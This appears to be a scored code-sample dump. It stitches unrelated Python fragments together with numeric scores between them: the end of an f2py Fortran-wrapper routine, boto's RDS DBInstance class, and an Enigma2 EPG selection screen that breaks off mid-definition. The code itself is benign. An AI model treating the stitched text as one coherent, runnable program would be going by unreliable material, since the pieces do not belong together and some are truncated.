%s\n'%`pyffilename`,0) pyf=crack2fortran(postlist) f=open(pyffilename,'w') f.write(pyf) f.close() if showblocklist: show(postlist)
0.024652
# Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/ # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. from boto.rds.dbsecuritygroup import DBSecurityGroup from boto.rds.parametergroup import ParameterGroup from boto.resultset import ResultSet class DBInstance(object): """ Represents a RDS DBInstance Properties reference available from the AWS documentation at http://goo.gl/sC2Kn :ivar connection: connection :ivar id: The name and identifier of the DBInstance :ivar create_time: The date and time of creation :ivar engine: The database engine being used :ivar status: The status of the database in a string. e.g. "available" :ivar allocated_storage: The size of the disk in gigabytes (int). :ivar endpoint: A tuple that describes the hostname and port of the instance. This is only available when the database is in status "available". :ivar instance_class: Contains the name of the compute and memory capacity class of the DB Instance. 
:ivar master_username: The username that is set as master username at creation time. :ivar parameter_groups: Provides the list of DB Parameter Groups applied to this DB Instance. :ivar security_groups: Provides List of DB Security Group elements containing only DBSecurityGroup.Name and DBSecurityGroup.Status subelements. :ivar availability_zone: Specifies the name of the Availability Zone the DB Instance is located in. :ivar backup_retention_period: Specifies the number of days for which automatic DB Snapshots are retained. :ivar preferred_backup_window: Specifies the daily time range during which automated backups are created if automated backups are enabled, as determined by the backup_retention_period. :ivar preferred_maintenance_window: Specifies the weekly time range (in UTC) during which system maintenance can occur. (string) :ivar latest_restorable_time: Specifies the latest time to which a database can be restored with point-in-time restore. (string) :ivar multi_az: Boolean that specifies if the DB Instance is a Multi-AZ deployment. :ivar iops: The current number of provisioned IOPS for the DB Instance. Can be None if this is a standard instance. :ivar pending_modified_values: Specifies that changes to the DB Instance are pending. This element is only included when changes are pending. Specific changes are identified by subelements. :ivar read_replica_dbinstance_identifiers: List of read replicas associated with this DB instance. 
""" def __init__(self, connection=None, id=None): self.connection = connection self.id = id self.create_time = None self.engine = None self.status = None self.allocated_storage = None self.endpoint = None self.instance_class = None self.master_username = None self.parameter_groups = [] self.security_groups = [] self.read_replica_dbinstance_identifiers = [] self.availability_zone = None self.backup_retention_period = None self.preferred_backup_window = None self.preferred_maintenance_window = None self.latest_restorable_time = None self.multi_az = False self.iops = None self.pending_modified_values = None self._in_endpoint = False self._port = None self._address = None def __repr__(self): return 'DBInstance:%s' % self.id def startElement(self, name, attrs, connection): if name == 'Endpoint': self._in_endpoint = True elif name == 'DBParameterGroups': self.parameter_groups = ResultSet([('DBParameterGroup', ParameterGroup)]) return self.parameter_groups elif name == 'DBSecurityGroups': self.security_groups = ResultSet([('DBSecurityGroup', DBSecurityGroup)]) return self.security_groups elif name == 'PendingModifiedValues': self.pending_modified_values = PendingModifiedValues() return self.pending_modified_values elif name == 'ReadReplicaDBInstanceIdentifiers': self.read_replica_dbinstance_identifiers = \ ReadReplicaDBInstanceIdentifiers() return self.read_replica_dbinstance_identifiers return None def endElement(self, name, value, connection): if name == 'DBInstanceIdentifier': self.id = value elif name == 'DBInstanceStatus': self.status = value elif name == 'InstanceCreateTime': self.create_time = value elif name == 'Engine': self.engine = value elif name == 'DBInstanceStatus': self.status = value elif name == 'AllocatedStorage': self.allocated_storage = int(value) elif name == 'DBInstanceClass': self.instance_class = value elif name == 'MasterUsername': self.master_username = value elif name == 'Port': if self._in_endpoint: self._port = int(value) elif name == 
'Address': if self._in_endpoint: self._address = value elif name == 'Endpoint': self.endpoint = (self._address, self._port) self._in_endpoint = False elif name == 'AvailabilityZone': self.availability_zone = value elif name == 'BackupRetentionPeriod': self.backup_retention_period = value elif name == 'LatestRestorableTime': self.latest_restorable_time = value elif name == 'PreferredMaintenanceWindow': self.preferred_maintenance_window = value elif name == 'PreferredBackupWindow': self.preferred_backup_window = value elif name == 'MultiAZ': if value.lower() == 'true': self.multi_az = True elif name == 'Iops': self.iops = int(value) else: setattr(self, name, value) @property def security_group(self): """ Provide backward compatibility for previous security_group attribute. """ if len(self.security_groups) > 0: return self.security_groups[-1] else: return None @property def parameter_group(self): """ Provide backward compatibility for previous parameter_group attribute. """ if len(self.parameter_groups) > 0: return self.parameter_groups[-1] else: return None def snapshot(self, snapshot_id): """ Create a new DB snapshot of this DBInstance. :type identifier: string :param identifier: The identifier for the DBSnapshot :rtype: :class:`boto.rds.dbsnapshot.DBSnapshot` :return: The newly created DBSnapshot """ return self.connection.create_dbsnapshot(snapshot_id, self.id) def reboot(self): """ Reboot this DBInstance :rtype: :class:`boto.rds.dbsnapshot.DBSnapshot` :return: The newly created DBSnapshot """ return self.connection.reboot_dbinstance(self.id) def update(self, validate=False): """ Update the DB instance's status information by making a call to fetch the current instance attributes from the service. :type validate: bool :param validate: By default, if EC2 returns no data about the instance the update method returns quietly. If the validate param is True, however, it will raise a ValueError exception if no data is returned from EC2. 
""" rs = self.connection.get_all_dbinstances(self.id) if len(rs) > 0: for i in rs: if i.id == self.id: self.__dict__.update(i.__dict__) elif validate: raise ValueError('%s is not a valid Instance ID' % self.id) return self.status def stop(self, skip_final_snapshot=False, final_snapshot_id=''): """ Delete this DBInstance. :type skip_final_snapshot: bool :param skip_final_snapshot: This parameter determines whether a final db snapshot is created before the instance is deleted. If True, no snapshot is created. If False, a snapshot is created before deleting the instance. :type final_snapshot_id: str :param final_snapshot_id: If a final snapshot is requested, this is the identifier used for that snapshot. :rtype: :class:`boto.rds.dbinstance.DBInstance` :return: The deleted db instance. """ return self.connection.delete_dbinstance(self.id, skip_final_snapshot, final_snapshot_id) def modify(self, param_group=None, security_groups=None, preferred_maintenance_window=None, master_password=None, allocated_storage=None, instance_class=None, backup_retention_period=None, preferred_backup_window=None, multi_az=False, iops=None, apply_immediately=False): """ Modify this DBInstance. :type param_group: str :param param_group: Name of DBParameterGroup to associate with this DBInstance. :type security_groups: list of str or list of DBSecurityGroup objects :param security_groups: List of names of DBSecurityGroup to authorize on this DBInstance. :type preferred_maintenance_window: str :param preferred_maintenance_window: The weekly time range (in UTC) during which maintenance can occur. Default is Sun:05:00-Sun:09:00 :type master_password: str :param master_password: Password of master user for the DBInstance. Must be 4-15 alphanumeric characters. :type allocated_storage: int :param allocated_storage: The new allocated storage size, in GBs. Valid values are [5-1024] :type instance_class: str :param instance_class: The compute and memory capacity of the DBInstance. 
Changes will be applied at next maintenance window unless apply_immediately is True. Valid values are: * db.m1.small * db.m1.large * db.m1.xlarge * db.m2.xlarge * db.m2.2xlarge * db.m2.4xlarge :type apply_immediately: bool :param apply_immediately: If true, the modifications will be applied as soon as possible rather than waiting for the next preferred maintenance window. :type backup_retention_period: int :param backup_retention_period: The number of days for which automated backups are retained. Setting this to zero disables automated backups. :type preferred_backup_window: str :param preferred_backup_window: The daily time range during which automated backups are created (if enabled). Must be in h24:mi-hh24:mi format (UTC). :type multi_az: bool :param multi_az: If True, specifies the DB Instance will be deployed in multiple availability zones. :type iops: int :param iops: The amount of IOPS (input/output operations per second) to Provisioned for the DB Instance. Can be modified at a later date. Must scale linearly. For every 1000 IOPS provision, you must allocated 100 GB of storage space. This scales up to 1 TB / 10 000 IOPS for MySQL and Oracle. MSSQL is limited to 700 GB / 7 000 IOPS. If you specify a value, it must be at least 1000 IOPS and you must allocate 100 GB of storage. :rtype: :class:`boto.rds.dbinstance.DBInstance` :return: The modified db instance. 
""" return self.connection.modify_dbinstance(self.id, param_group, security_groups, preferred_maintenance_window, master_password, allocated_storage, instance_class, backup_retention_period, preferred_backup_window, multi_az, apply_immediately, iops) class PendingModifiedValues(dict): def startElement(self, name, attrs, connection): return None def endElement(self, name, value, connection): if name != 'PendingModifiedValues': self[name] = value class ReadReplicaDBInstanceIdentifiers(list): def startElement(self, name, attrs, connection): return None def endElement(self, name, value, connection): if name == 'ReadReplicaDBInstanceIdentifier': self.append(value)
0
from __future__ import absolute_import from time import localtime, time, strftime, mktime from enigma import eServiceReference, eTimer, eServiceCenter, ePoint from Screens.Screen import Screen from Screens.HelpMenu import HelpableScreen from Components.About import about from Components.ActionMap import HelpableActionMap, HelpableNumberActionMap from Components.Button import Button from Components.config import config, configfile, ConfigClock from Components.EpgList import EPGList, EPGBouquetList, TimelineText, EPG_TYPE_SINGLE, EPG_TYPE_SIMILAR, EPG_TYPE_MULTI, EPG_TYPE_ENHANCED, EPG_TYPE_INFOBAR, EPG_TYPE_INFOBARGRAPH, EPG_TYPE_GRAPH, EPG_TYPE_VERTICAL, MAX_TIMELINES from Components.MenuList import MenuList from Components.Label import Label from Components.Pixmap import Pixmap from Components.Sources.ServiceEvent import ServiceEvent from Components.Sources.Event import Event from Components.UsageConfig import preferredTimerPath from Screens.TimerEdit import TimerSanityConflict from Screens.EventView import EventViewEPGSelect, EventViewSimple from Screens.ChoiceBox import ChoiceBox from Screens.MessageBox import MessageBox from Screens.PictureInPicture import PictureInPicture from Screens.Setup import Setup from Screens.TimeDateInput import TimeDateInput from RecordTimer import RecordTimerEntry, parseEvent, AFTEREVENT from Screens.TimerEntry import TimerEntry, InstantRecordTimerEntry from ServiceReference import ServiceReference from Tools.HardwareInfo import HardwareInfo from RecordTimer import TIMERTYPE from skin import getSkinFactor mepg_config_initialized = False # PiPServiceRelation installed? 
# Optional dependency: the PiPServiceRelation plugin maps a service to an
# alternative service to be shown in Picture-in-Picture.
try:
	from Plugins.SystemPlugins.PiPServiceRelation.plugin import getRelationDict
	plugin_PiPServiceRelation_installed = True
except:
	plugin_PiPServiceRelation_installed = False


class EPGSelection(Screen, HelpableScreen):
	"""EPG browser screen supporting several layouts (single, enhanced,
	infobar, graphical, multi and vertical EPG).

	The concrete behaviour is selected via the ``EPGtype`` constructor
	argument; most methods below branch on ``self.type``.
	"""

	# Green-button states (see key_green_choice handling elsewhere).
	EMPTY = 0
	ADD_TIMER = 1
	REMOVE_TIMER = 2
	ZAP = 1

	def __init__(self, session, service = None, zapFunc = None, eventid = None, bouquetChangeCB=None, serviceChangeCB = None, EPGtype = None, StartBouquet = None, StartRef = None, bouquets = None):
		"""Create the EPG screen.

		service: starting service (or servicelist, depending on EPG type)
		zapFunc: callback used to zap to a selected service
		eventid: event id for the 'similar events' view
		EPGtype: one of 'single', 'infobar', 'enhanced', 'graph',
			'infobargraph', 'multi', 'vertical' or None
		StartBouquet/StartRef/bouquets: initial bouquet context
		"""
		Screen.__init__(self, session)
		self.setTitle(_('EPG Selection'))
		HelpableScreen.__init__(self)
		self.zapFunc = zapFunc
		self.serviceChangeCB = serviceChangeCB
		self.bouquets = bouquets
		# 'graphic' switches the graph/timeline renderers to bitmap mode.
		graphic = False
		if EPGtype == 'single':
			self.type = EPG_TYPE_SINGLE
		elif EPGtype == 'infobar':
			self.type = EPG_TYPE_INFOBAR
		elif EPGtype == 'enhanced':
			self.type = EPG_TYPE_ENHANCED
		elif EPGtype == 'graph':
			self.type = EPG_TYPE_GRAPH
			if config.epgselection.graph_type_mode.value == "graphics":
				graphic = True
		elif EPGtype == 'infobargraph':
			self.type = EPG_TYPE_INFOBARGRAPH
			if config.epgselection.infobar_type_mode.value == "graphics":
				graphic = True
		elif EPGtype == 'multi':
			self.type = EPG_TYPE_MULTI
		elif EPGtype == 'vertical':
			self.type = EPG_TYPE_VERTICAL
		elif EPGtype is None and eventid == None and isinstance(service, eServiceReference):
			# Fallback: a bare service reference means single-service EPG.
			self.type = EPG_TYPE_SINGLE
		else:
			self.type = EPG_TYPE_SIMILAR
		if not self.type == EPG_TYPE_SINGLE:
			self.StartBouquet = StartBouquet
			self.StartRef = StartRef
		self.servicelist = None
		self.ChoiceBoxDialog = None
		self.ask_time = -1
		self.closeRecursive = False
		self.eventviewDialog = None
		self.eventviewWasShown = False
		self.currch = None
		# Remember (and temporarily disable) an active PiP so it can be
		# restored when this screen closes.
		self.Oldpipshown = False
		if self.session.pipshown:
			self.Oldpipshown = True
			self.session.pipshown = False
		self.cureventindex = None
		if plugin_PiPServiceRelation_installed:
			self.pipServiceRelation = getRelationDict()
		else:
			self.pipServiceRelation = {}
		# Number-zap state: typing digits jumps to a channel after a timeout.
		self.zapnumberstarted = False
		self.NumberZapTimer = eTimer()
		self.NumberZapTimer.callback.append(self.dozumberzap)
		self.NumberZapField = None
		self.CurrBouquet = None
		self.CurrService = None
		self['Service'] = ServiceEvent()
		self['Event'] = Event()
		self['lab1'] = Label(_('Please wait while gathering data...'))
		self.key_green_choice = self.EMPTY
		#//vertical
		# Vertical EPG keeps its own bouquet/service bookkeeping: up to
		# five side-by-side per-channel event lists (see list1..list5 below).
		if self.type == EPG_TYPE_VERTICAL:
			self.StartBouquet = StartBouquet
			self.StartRef = StartRef
			self.servicelist = service
			self.bouquetlist_active = False
			self.firststart = True
			self.lastEventTime = (time(), time()+3600)
			self.lastMinus = 0
			self.activeList = 1
			self.myServices = []
			self.list = []
		else:
			# Empty string so self['list'+str(self.activeList)] -> self['list'].
			self.activeList = ''
		self["number"] = Label()
		self["number"].hide()
		#//
		if self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH or self.type == EPG_TYPE_VERTICAL:
			self.RefreshColouredKeys()
		else:
			self['key_red'] = Button(_('IMDb Search'))
			self['key_green'] = Button(_('Add Timer'))
			self['key_yellow'] = Button(_('EPG Search'))
			self['key_blue'] = Button(_('Add AutoTimer'))
		# Action map for the in-screen choice dialog; only enabled while the
		# dialog is open.
		self['dialogactions'] = HelpableActionMap(self, 'WizardActions',
			{
				'back': (self.closeChoiceBoxDialog, _('Close dialog')),
			}, -1)
		self['dialogactions'].csel = self
		self["dialogactions"].setEnabled(False)
		self['okactions'] = HelpableActionMap(self, 'OkCancelActions',
			{
				'cancel': (self.closeScreen, _('Exit EPG')),
				'OK': (self.OK, _('Zap to channel (setup in menu)')),
				'OKLong': (self.OKLong, _('Zap to channel and close (setup in menu)'))
			}, -1)
		self['okactions'].csel = self
		self['colouractions'] = HelpableActionMap(self, 'ColorActions',
			{
				'red': (self.redButtonPressed, _('IMDB search for current event')),
				'redlong': (self.redButtonPressedLong, _('Sort EPG List')),
				'green': (self.greenButtonPressed, _('Add/Remove timer for current event')),
				'greenlong': (self.greenButtonPressedLong, _('Show Timer List')),
				'yellow': (self.yellowButtonPressed, _('Search for similar events')),
				'blue': (self.blueButtonPressed, _('Add a auto timer for current event')),
				'bluelong': (self.blueButtonPressedLong, _('Show AutoTimer List'))
			}, -1)
		self['colouractions'].csel = self
		self['recordingactions'] = HelpableActionMap(self, 'InfobarInstantRecord',
			{
				'ShortRecord': (self.recButtonPressed, _('Add a record timer for current event')),
				'LongRecord': (self.recButtonPressedLong, _('Add a zap timer for current event'))
			}, -1)
		self['recordingactions'].csel = self
		# --- Per-EPG-type setup: skin name, action maps and key bindings. ---
		if self.type == EPG_TYPE_SIMILAR:
			self.currentService = service
			self.eventid = eventid
			self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions',
				{
					'info': (self.Info, _('Show detailed event info')),
					'infolong': (self.InfoLong, _('Show single epg for current channel')),
					'menu': (self.createSetup, _('Setup menu'))
				}, -1)
			self['epgactions'].csel = self
		elif self.type == EPG_TYPE_SINGLE:
			self.currentService = ServiceReference(service)
			self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions',
				{
					'nextService': (self.nextService, _('Goto next channel')),
					'prevService': (self.prevService, _('Goto previous channel')),
					'info': (self.Info, _('Show detailed event info')),
					'epg': (self.Info, _('Show detailed event info')),
					'menu': (self.createSetup, _('Setup menu'))
				}, -1)
			self['epgactions'].csel = self
			self['epgcursoractions'] = HelpableActionMap(self, 'DirectionActions',
				{
					'left': (self.prevPage, _('Move up a page')),
					'right': (self.nextPage, _('Move down a page')),
					'up': (self.moveUp, _('Goto previous channel')),
					'down': (self.moveDown, _('Goto next channel'))
				}, -1)
			self['epgcursoractions'].csel = self
		elif self.type == EPG_TYPE_INFOBAR or self.type == EPG_TYPE_ENHANCED:
			if self.type == EPG_TYPE_INFOBAR:
				self.skinName = 'QuickEPG'
				self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions',
					{
						'nextBouquet': (self.nextBouquet, _('Goto next bouquet')),
						'prevBouquet': (self.prevBouquet, _('Goto previous bouquet')),
						'nextService': (self.nextPage, _('Move down a page')),
						'prevService': (self.prevPage, _('Move up a page')),
						'input_date_time': (self.enterDateTime, _('Goto specific data/time')),
						'epg': (self.epgButtonPressed, _('Show single epg for current channel')),
						'info': (self.Info, _('Show detailed event info')),
						'infolong': (self.InfoLong, _('Show single epg for current channel')),
						'menu': (self.createSetup, _('Setup menu'))
					}, -1)
				self['epgactions'].csel = self
				self['epgcursoractions'] = HelpableActionMap(self, 'DirectionActions',
					{
						'left': (self.prevService, _('Goto previous channel')),
						'right': (self.nextService, _('Goto next channel')),
						'up': (self.moveUp, _('Goto previous channel')),
						'down': (self.moveDown, _('Goto next channel'))
					}, -1)
				self['epgcursoractions'].csel = self
			elif self.type == EPG_TYPE_ENHANCED:
				self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions',
					{
						'nextBouquet': (self.nextBouquet, _('Goto next bouquet')),
						'prevBouquet': (self.prevBouquet, _('Goto previous bouquet')),
						'nextService': (self.nextService, _('Goto next channel')),
						'prevService': (self.prevService, _('Goto previous channel')),
						'input_date_time': (self.enterDateTime, _('Goto specific data/time')),
						'info': (self.Info, _('Show detailed event info')),
						'infolong': (self.InfoLong, _('Show single epg for current channel')),
						'epg': (self.Info, _('Show detailed event info')),
						'menu': (self.createSetup, _('Setup menu'))
					}, -1)
				self['epgactions'].csel = self
				self['epgcursoractions'] = HelpableActionMap(self, 'DirectionActions',
					{
						'left': (self.prevPage, _('Move up a page')),
						'right': (self.nextPage, _('Move down a page')),
						'up': (self.moveUp, _('Goto previous channel')),
						'down': (self.moveDown, _('Goto next channel'))
					}, -1)
				self['epgcursoractions'].csel = self
			# Digits start a number-zap (shared by infobar and enhanced EPG).
			self['input_actions'] = HelpableNumberActionMap(self, 'NumberActions',
				{
					'0': (self.keyNumberGlobal, _('enter number to jump to channel.')),
					'1': (self.keyNumberGlobal, _('enter number to jump to channel.')),
					'2': (self.keyNumberGlobal, _('enter number to jump to channel.')),
					'3': (self.keyNumberGlobal, _('enter number to jump to channel.')),
					'4': (self.keyNumberGlobal, _('enter number to jump to channel.')),
					'5': (self.keyNumberGlobal, _('enter number to jump to channel.')),
					'6': (self.keyNumberGlobal, _('enter number to jump to channel.')),
					'7': (self.keyNumberGlobal, _('enter number to jump to channel.')),
					'8': (self.keyNumberGlobal, _('enter number to jump to channel.')),
					'9': (self.keyNumberGlobal, _('enter number to jump to channel.'))
				}, -1)
			self['input_actions'].csel = self
			self.list = []
			self.servicelist = service
			self.currentService = self.session.nav.getCurrentlyPlayingServiceOrGroup()
		elif self.type == EPG_TYPE_GRAPH or self.type == EPG_TYPE_INFOBARGRAPH:
			if self.type == EPG_TYPE_GRAPH:
				if not config.epgselection.graph_pig.value:
					self.skinName = 'GraphicalEPG'
				else:
					self.skinName = 'GraphicalEPGPIG'
				# Start time: now, shifted back by the configured history
				# window and rounded down to the configured grid step.
				now = time() - int(config.epgselection.graph_histminutes.value) * 60
				self.ask_time = now - now % (int(config.epgselection.graph_roundto.value) * 60)
				if 'primetime' in config.epgselection.graph_startmode.value:
					basetime = localtime(self.ask_time)
					basetime = (basetime[0], basetime[1], basetime[2], int(config.epgselection.graph_primetimehour.value), int(config.epgselection.graph_primetimemins.value), 0, basetime[6], basetime[7], basetime[8])
					self.ask_time = mktime(basetime)
					# Primetime already (nearly) over today -> show tomorrow's.
					if self.ask_time + 3600 < time():
						self.ask_time += 86400
			elif self.type == EPG_TYPE_INFOBARGRAPH:
				self.skinName = 'GraphicalInfoBarEPG'
				now = time() - int(config.epgselection.infobar_histminutes.value) * 60
				self.ask_time = now - now % (int(config.epgselection.infobar_roundto.value) * 60)
			self.closeRecursive = False
			self.bouquetlist_active = False
			self['bouquetlist'] = EPGBouquetList(graphic=graphic)
			self['bouquetlist'].hide()
			self['timeline_text'] = TimelineText(type=self.type, graphic=graphic)
			self['Event'] = Event()
			self['primetime'] = Label(_('PRIMETIME'))
			self['change_bouquet'] = Label(_('CHANGE BOUQUET'))
			self['jump'] = Label(_('JUMP 24 HOURS'))
			self['page'] = Label(_('PAGE UP/DOWN'))
			# One pixmap per timeline tick, plus the 'now' marker.
			self.time_lines = []
			for x in range(0, MAX_TIMELINES):
				pm = Pixmap()
				self.time_lines.append(pm)
				self['timeline%d' % x] = pm
			self['timeline_now'] = Pixmap()
			self.updateTimelineTimer = eTimer()
			self.updateTimelineTimer.callback.append(self.moveTimeLines)
			self.updateTimelineTimer.start(60000)
			self['bouquetokactions'] = HelpableActionMap(self, 'OkCancelActions',
				{
					'cancel': (self.BouquetlistHide, _('Close bouquet list.')),
					'OK': (self.BouquetOK, _('Change to bouquet')),
				}, -1)
			self['bouquetokactions'].csel = self
			self["bouquetokactions"].setEnabled(False)
			self['bouquetcursoractions'] = HelpableActionMap(self, 'DirectionActions',
				{
					'left': (self.moveBouquetPageUp, _('Goto previous event')),
					'right': (self.moveBouquetPageDown, _('Goto next event')),
					'up': (self.moveBouquetUp, _('Goto previous channel')),
					'down': (self.moveBouquetDown, _('Goto next channel'))
				}, -1)
			self['bouquetcursoractions'].csel = self
			self["bouquetcursoractions"].setEnabled(False)
			self['epgcursoractions'] = HelpableActionMap(self, 'DirectionActions',
				{
					'left': (self.leftPressed, _('Goto previous event')),
					'right': (self.rightPressed, _('Goto next event')),
					'up': (self.moveUp, _('Goto previous channel')),
					'down': (self.moveDown, _('Goto next channel'))
				}, -1)
			self['epgcursoractions'].csel = self
			# CH+/- behaviour in graph mode is configurable: bouquet change,
			# page up/down or 24h jump.
			if config.epgselection.graph_channelbtn.value == 'bouquet':
				self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions',
					{
						'nextService': (self.nextBouquet, _('Goto next bouquet')),
						'prevService': (self.prevBouquet, _('Goto previous bouquet')),
						'nextBouquet': (self.nextBouquet, _('Goto next bouquet')),
						'prevBouquet': (self.prevBouquet, _('Goto previous bouquet')),
						'input_date_time': (self.enterDateTime, _('Goto specific data/time')),
						'epg': (self.epgButtonPressed, _('Show single epg for current channel')),
						'info': (self.Info, _('Show detailed event info')),
						'infolong': (self.InfoLong, _('Show single epg for current channel')),
						'tv': (self.Bouquetlist, _('Toggle between bouquet/epg lists')),
						'tvlong': (self.togglePIG, _('Toggle Picture In Graphics')),
						'menu': (self.createSetup, _('Setup menu'))
					}, -1)
			elif config.epgselection.graph_channelbtn.value == 'page':
				self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions',
					{
						'nextService': (self.nextPage, _('Page down')),
						'prevService': (self.prevPage, _('Page up')),
						'nextBouquet': (self.nextBouquet, _('Goto next bouquet')),
						'prevBouquet': (self.prevBouquet, _('Goto previous bouquet')),
						'input_date_time': (self.enterDateTime, _('Goto specific data/time')),
						'epg': (self.epgButtonPressed, _('Show single epg for current channel')),
						'info': (self.Info, _('Show detailed event info')),
						'infolong': (self.InfoLong, _('Show single epg for current channel')),
						'tv': (self.Bouquetlist, _('Toggle between bouquet/epg lists')),
						'tvlong': (self.togglePIG, _('Toggle Picture In Graphics')),
						'menu': (self.createSetup, _('Setup menu'))
					}, -1)
			else:
				self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions',
					{
						'nextService': (self.nextService, _('Jump forward 24 hours')),
						'prevService': (self.prevService, _('Jump back 24 hours')),
						'nextBouquet': (self.nextBouquet, _('Goto next bouquet')),
						'prevBouquet': (self.prevBouquet, _('Goto previous bouquet')),
						'input_date_time': (self.enterDateTime, _('Goto specific data/time')),
						'epg': (self.epgButtonPressed, _('Show single epg for current channel')),
						'info': (self.Info, _('Show detailed event info')),
						'infolong': (self.InfoLong, _('Show single epg for current channel')),
						'tv': (self.Bouquetlist, _('Toggle between bouquet/epg lists')),
						'tvlong': (self.togglePIG, _('Toggle Picture In Graphics')),
						'menu': (self.createSetup, _('Setup menu'))
					}, -1)
			self['epgactions'].csel = self
			# Digits are navigation shortcuts in graph mode (not number-zap).
			self['input_actions'] = HelpableNumberActionMap(self, 'NumberActions',
				{
					'1': (self.keyNumberGlobal, _('Reduce time scale')),
					'2': (self.keyNumberGlobal, _('Page up')),
					'3': (self.keyNumberGlobal, _('Increase time scale')),
					'4': (self.keyNumberGlobal, _('page left')),
					'5': (self.keyNumberGlobal, _('Jump to current time')),
					'6': (self.keyNumberGlobal, _('Page right')),
					'7': (self.keyNumberGlobal, _('No of items switch (increase or reduced)')),
					'8': (self.keyNumberGlobal, _('Page down')),
					'9': (self.keyNumberGlobal, _('Jump to prime time')),
					'0': (self.keyNumberGlobal, _('Move to home of list'))
				}, -1)
			self['input_actions'].csel = self
		elif self.type == EPG_TYPE_MULTI:
			self.skinName = 'EPGSelectionMulti'
			self['bouquetlist'] = EPGBouquetList(graphic=graphic)
			self['bouquetlist'].hide()
			self['now_button'] = Pixmap()
			self['next_button'] = Pixmap()
			self['more_button'] = Pixmap()
			self['now_button_sel'] = Pixmap()
			self['next_button_sel'] = Pixmap()
			self['more_button_sel'] = Pixmap()
			self['now_text'] = Label()
			self['next_text'] = Label()
			self['more_text'] = Label()
			self['date'] = Label()
			self.bouquetlist_active = False
			self['bouquetokactions'] = HelpableActionMap(self, 'OkCancelActions',
				{
					'OK': (self.BouquetOK, _('Change to bouquet')),
				}, -1)
			self['bouquetokactions'].csel = self
			self["bouquetokactions"].setEnabled(False)
			self['bouquetcursoractions'] = HelpableActionMap(self, 'DirectionActions',
				{
					'left': (self.moveBouquetPageUp, _('Goto previous event')),
					'right': (self.moveBouquetPageDown, _('Goto next event')),
					'up': (self.moveBouquetUp, _('Goto previous channel')),
					'down': (self.moveBouquetDown, _('Goto next channel'))
				}, -1)
			self['bouquetcursoractions'].csel = self
			self['bouquetcursoractions'].setEnabled(False)
			self['epgcursoractions'] = HelpableActionMap(self, 'DirectionActions',
				{
					'left': (self.leftPressed, _('Goto previous event')),
					'right': (self.rightPressed, _('Goto next event')),
					'up': (self.moveUp, _('Goto previous channel')),
					'down': (self.moveDown, _('Goto next channel'))
				}, -1)
			self['epgcursoractions'].csel = self
			self['epgactions'] = HelpableActionMap(self, 'EPGSelectActions',
				{
					'nextService': (self.nextPage, _('Move down a page')),
					'prevService': (self.prevPage, _('Move up a page')),
					'nextBouquet': (self.nextBouquet, _('Goto next bouquet')),
					'prevBouquet': (self.prevBouquet, _('Goto previous bouquet')),
					'input_date_time': (self.enterDateTime, _('Goto specific data/time')),
					'epg': (self.epgButtonPressed, _('Show single epg for current channel')),
					'info': (self.Info, _('Show detailed event info')),
					'infolong': (self.InfoLong, _('Show single epg for current channel')),
					'tv': (self.Bouquetlist, _('Toggle between bouquet/epg lists')),
					'menu': (self.createSetup, _('Setup menu'))
				}, -1)
			self['epgactions'].csel = self
		elif self.type == EPG_TYPE_VERTICAL:
			# With PIG (picture-in-graphics) enabled there is room for four
			# channel columns, otherwise six (column 0 is the channel list).
			if config.epgselection.vertical_pig.value:
				self.Fields = 4
				self.skinName = 'EPGverticalPIG'
			else:
				self.Fields = 6
				self.skinName = 'EPGvertical'
			self['bouquetlist'] = EPGBouquetList(graphic=graphic)
			self['bouquetlist'].hide()
			self["list"] = MenuList([ ])
			self["piconCh1"] = ServiceEvent()
			self["piconCh2"] = ServiceEvent()
			self["piconCh3"] = ServiceEvent()
			self["piconCh4"] = ServiceEvent()
			self["piconCh5"] = ServiceEvent()
			self["currCh1"] = Label(" ")
			self["currCh2"] = Label(" ")
			self["currCh3"] = Label(" ")
			self["currCh4"] = Label(" ")
			self["currCh5"] = Label(" ")
			self["Active1"] = Label(" ")
			self["Active2"] = Label(" ")
			self["Active3"] = Label(" ")
			self["Active4"] = Label(" ")
			self["Active5"] = Label(" ")
			# One EPGList per visible channel column.
			self["list1"] = EPGList(type = EPG_TYPE_VERTICAL, selChangedCB = self.onSelectionChanged, timer = session.nav.RecordTimer)
			self["list2"] = EPGList(type = EPG_TYPE_VERTICAL, selChangedCB = self.onSelectionChanged, timer = session.nav.RecordTimer)
			self["list3"] = EPGList(type = EPG_TYPE_VERTICAL, selChangedCB = self.onSelectionChanged, timer = session.nav.RecordTimer)
			self["list4"] = EPGList(type = EPG_TYPE_VERTICAL, selChangedCB = self.onSelectionChanged, timer = session.nav.RecordTimer)
			self["list5"] = EPGList(type = EPG_TYPE_VERTICAL, selChangedCB = self.onSelectionChanged, timer = session.nav.RecordTimer)
			self['bouquetokactions'] = HelpableActionMap(self, 'OkCancelActions',
				{
					'cancel': (self.BouquetlistHide, _('Close bouquet list.')),
					'OK': (self.BouquetOK, _('Change to bouquet')),
				}, -1)
			self['bouquetokactions'].csel = self
			self["bouquetokactions"].setEnabled(False)
			self['bouquetcursoractions'] = HelpableActionMap(self, 'DirectionActions',
				{
					'left': (self.moveBouquetPageUp, _('Goto previous event')),
					'right': (self.moveBouquetPageDown, _('Goto next event')),
